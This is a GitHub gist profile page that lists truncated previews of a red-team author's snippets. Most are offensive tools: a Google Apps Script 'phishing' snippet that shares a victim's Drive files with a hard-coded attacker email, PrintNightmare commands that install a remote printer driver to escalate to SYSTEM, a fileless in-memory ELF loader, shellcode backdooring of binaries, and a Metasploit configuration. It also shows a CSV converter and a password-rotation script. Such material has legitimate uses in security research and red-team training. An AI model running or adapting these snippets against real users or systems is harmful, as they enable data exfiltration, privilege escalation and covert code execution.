Skip to content

Instantly share code, notes, and snippets.

View ahhh's full-sized avatar
👾
danger code

Dan Borges ahhh

👾
danger code
722 followers · 788 following
View GitHub Profile
@ahhh
ahhh / driveSearch.gs
Last active June 16, 2023 00:55
Google App Script Phishing #2
function driveSearch() {
// Setup the exfil folder
var user = Session.getActiveUser().getEmail();
var folder = DriveApp.createFolder(user);
var attackerEmail = "ahhh.db@gmail.com";
folder.addViewer(attackerEmail);
// Search Drive
var files = DriveApp.searchFiles('hidden = false');
// Iterate through files in Drive
@ahhh
ahhh / csv_to_jsonl.py
Last active July 28, 2022 16:58
quick script to help convert documents
#!env python
import jsonlines
import argparse
import csv
def parseArgs():
parser = argparse.ArgumentParser(description='Convert CSV to JSONL')
parser.add_argument('file', type=str, help='csv file to read')
args = parser.parse_args()
print("Processing CSV File: " + args.file)
@ahhh
ahhh / PrintNightmareToSystem.sh
Created September 1, 2021 00:34
https://github.com/GossiTheDog/SystemNightmare/blob/main/SystemNightmare.bat
net use \\printnightmare.gentilkiwi.com\ipc$ /user:gentilguest password
rundll32 printui.dll,PrintUIEntry /in /n"\\printnightmare.gentilkiwi.com\Kiwi Legit Printer"
@ahhh
ahhh / Invoke-PasswordRoll.ps1
Last active May 24, 2021 07:36
Microsoft helper script to change the local account passwords
function Invoke-PasswordRoll
{
<#
.SYNOPSIS
This script can be used to set the local account passwords on remote machines to random passwords. The username/password/server combination will be saved in a CSV file.
The account passwords stored in the CSV file can be encrypted using a password of the administrators choosing to ensure clear-text account passwords aren't written to disk.
The encrypted passwords can be decrypted using another function in this file: ConvertTo-CleartextPassword
Function: Invoke-PasswordRoll
Author: Microsoft
Version: 1.0
@ahhh
ahhh / go-sharp-loader.go
Created August 5, 2020 21:20 — forked from ropnop/go-sharp-loader.go
Example Go file embedding multiple .NET executables
package main
/*
Example Go program with multiple .NET Binaries embedded
This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with:
$ go get -u github.com/gobuffalo/packr/packr
Place all your EXEs are in a "binaries" folder
@ahhh
ahhh / invokeInMemLinux.go
Created July 19, 2020 21:22 — forked from capnspacehook/invokeInMemLinux.go
Executes a binary or file in memory on a Linux system. Uses the memfd_create(2) syscall. Credits and idea from: https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html
package main
import (
"io/ioutil"
"os"
"os/exec"
"strconv"
"syscall"
@ahhh
ahhh / binjection_example.gs
Created July 2, 2020 23:32
Binjection example in gscript
// Example gscript template
// Title: Binjection Example
// Author: ahhh
// Purpose: Replaces an existing binary with a copy that has been backdoored with shellcode
// Gscript version: 1.0.0
// ATT&CK:
//priority:150
//timeout:150
//import:/tmp/loader.bin
@ahhh
ahhh / gbj.go
Created July 2, 2020 23:05
GBJ is a hacky shim used for using binjection in gscript
package gbj
import(
"github.com/Binject/binjection/bj"
)
func PeBinject(sourceBytes []byte, shellcodeBytes []byte) ([]byte, error) {
@ahhh
ahhh / binjection_example.go
Created July 2, 2020 00:04
Using the binject/binjection library programatically
package main
import(
"io/ioutil"
"fmt"
"github.com/Binject/binjection/bj"
)
var (
example_path = "example.exe"
@ahhh
ahhh / msfconsole.rc
Created February 25, 2020 09:02
example msfconsole.rc from red team planning book
spool /root/.msf4/spool.log
setg ConsoleLogging true
setg verbose true
setg LogLevel 5
setg SessionLogging true
setg TimestampOutput true
setg PromptTimeFormat %Y%m%d.%H%M%S%z
setg PROMPT %T S:%S J:%J
setg ExitOnSession false
setg DisableCourtesyShell true